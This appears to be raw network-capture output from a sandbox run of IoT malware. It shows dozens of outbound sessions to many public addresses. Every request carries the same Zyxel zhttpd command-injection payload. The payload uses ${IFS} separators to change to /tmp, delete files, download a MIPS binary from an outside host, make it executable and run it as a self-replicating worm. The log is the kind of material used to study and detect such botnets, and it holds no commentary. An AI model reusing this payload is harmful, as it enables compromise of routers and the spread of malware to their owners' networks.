                              Mar 31, 2024 08:42:27.581878901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9743192.168.2.1341052185.181.237.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581943035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9744192.168.2.1335524115.142.129.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581968069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9745192.168.2.1350754145.49.102.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581994057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9746192.168.2.134142220.202.126.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582048893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9747192.168.2.1344320164.213.172.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582107067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9748192.168.2.1347346115.152.250.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582129955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9749192.168.2.135018698.233.92.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582223892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9750192.168.2.133695480.71.207.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582250118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9751192.168.2.135043092.57.94.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582287073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9752192.168.2.1354930116.177.11.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582348108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9753192.168.2.134252049.183.218.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582356930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9754192.168.2.1338724128.108.79.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582398891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9755192.168.2.134189053.235.214.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582459927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9756192.168.2.1338672208.27.148.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582498074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9757192.168.2.1338218134.19.114.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582571030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9758192.168.2.13378005.82.167.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582613945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9759192.168.2.1358890102.68.49.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582667112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9760192.168.2.1338434144.143.145.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582698107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9761192.168.2.1349306105.194.200.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582741022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9762192.168.2.1333532220.220.120.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582773924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9763192.168.2.1355768114.210.77.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582803011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9764192.168.2.1335218162.81.134.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582850933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9765192.168.2.1335954206.69.19.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582880020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9766192.168.2.1342398150.185.93.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582918882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9767192.168.2.1334588209.131.159.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582948923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9768192.168.2.135980864.96.39.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.582993984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9769192.168.2.134651260.73.252.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583018064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9770192.168.2.134143870.220.255.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583061934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9771192.168.2.133379084.123.43.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583117008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9772192.168.2.13505422.45.247.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583180904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9773192.168.2.1339908139.208.191.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583242893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9774192.168.2.135423287.249.240.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583261967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9775192.168.2.1358318213.42.97.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583287001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9776192.168.2.13555682.15.123.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583329916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9777192.168.2.133408018.155.88.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583386898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9778192.168.2.135249885.188.71.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583415985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9779192.168.2.1351950102.150.30.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583462954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9780192.168.2.1358238160.169.154.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583523989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9781192.168.2.134233250.235.54.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583563089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9782192.168.2.1335338222.195.108.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583597898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9783192.168.2.1335246212.215.100.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583626986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9784192.168.2.1359322203.92.37.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583663940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9785192.168.2.1338806217.251.66.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583693027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9786192.168.2.133628627.221.218.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583735943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9787192.168.2.1345914208.14.33.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583791018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9788192.168.2.1344608175.79.239.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583832979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9789192.168.2.1348142212.153.92.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583848000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9790192.168.2.134174036.181.21.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583910942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9791192.168.2.1335138172.207.130.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.583929062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9792192.168.2.134452438.29.56.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584012985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9793192.168.2.134446217.137.226.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584028006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9794192.168.2.133779864.207.188.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584080935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9795192.168.2.1336908201.0.10.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584109068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9796192.168.2.1347984105.80.208.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584148884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9797192.168.2.133403296.158.11.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584172010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9798192.168.2.13436328.242.156.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584199905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9799192.168.2.134367848.246.212.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584254980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9800192.168.2.1340930201.247.89.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584301949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9801192.168.2.135137225.193.221.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584330082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9802192.168.2.133436286.219.105.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584368944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9803192.168.2.1347660202.164.159.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584394932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9804192.168.2.135750614.20.166.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584434032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9805192.168.2.134429670.16.177.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584501028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9806192.168.2.134638477.34.252.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584537029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9807192.168.2.135148669.124.49.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584604979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9808192.168.2.1341484185.106.234.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584626913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9809192.168.2.1359618133.189.214.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584667921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9810192.168.2.1339910189.140.202.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584706068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9811192.168.2.135300044.151.40.182443
                              TimestampBytes transferredDirectionData
